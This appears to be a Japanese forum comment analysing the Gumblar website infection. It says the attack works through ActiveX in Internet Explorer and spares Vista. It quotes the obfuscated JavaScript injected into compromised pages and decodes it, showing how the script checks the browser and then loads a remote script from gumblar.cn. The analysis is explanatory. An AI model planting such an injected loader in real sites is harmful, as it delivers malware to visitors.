|
Logue |
09/05/20 23:06 |
みたところ、例によってActiveXの脆弱性を突くタイプだから、IE使わなければ感染しないと思う。
あと、Vistaの場合UACが働いている上に、ウィルスそのもののターゲットがXPと2kなのでよっぽどセキュリティの設定を落としてもいない限り感染しないとのこと。
実際感染したというサイトは、以下のようなJavaScriptが挿入されるらしい。
<script language=javascript><!--
(function(DSY){var MCe='%';var YNe=('-76ar-20a-3d-22Scrip-74E-6egine-22-2c-62-3d-22V-65-72sio-6e-28-29+-22-2cj-3d-22-22-2cu-3d-6e-61vigato-72-2eus-65-72Agen-74-3bif((u-2ei-6edexO-66-28-22W-69-6e-22)-3e0-29-26-26(u-2e-69ndexOf(-22NT-206-22)-3c-30-29-26-26-28-64ocum-65-6et-2ec-6f-6f-6b-69-65-2eind-65xOf-28-22miek-3d1-22)-3c0)-26-26(typeof(zrvzt-73-29-21-3d-74yp-65of(-22A-22)))-7bzrvzt-73-3d-22A-22-3bev-61l(-22if(wi-6edow-2e-22+-61+-22)j-3d-6a+-22+a+-22-4dajor-22-2bb+a-2b-22M-69n-6fr-22+b-2ba+-22Build-22+b-2b-22j-3b-22)-3bdo-63ument-2ew-72ite(-22-3cscrip-74-20src-3d-2f-2fgu-6d-62lar-2ecn-2frss-2f-3fid-3d-22+j-2b-22-3e-3c-5c-2f-73-63ript-3e-22)-3b-7d').replace(DSY,MCe);eval(unescape(YNe))})(/-/g);
--></script>
<以下略>
これを解読すると・・・
var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a "Major"+b a+"Minor" b+a "Build" b+"j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}
ってコードが出てくる。確かに、Vistaはコードレベルで対象外だね。
これ自体は、割と昔からある穴の付き方。(一昨年だったか、HDDが消去されるというウィルスもこれだった。http://www.nicovideo.jp/watch/sm1909241)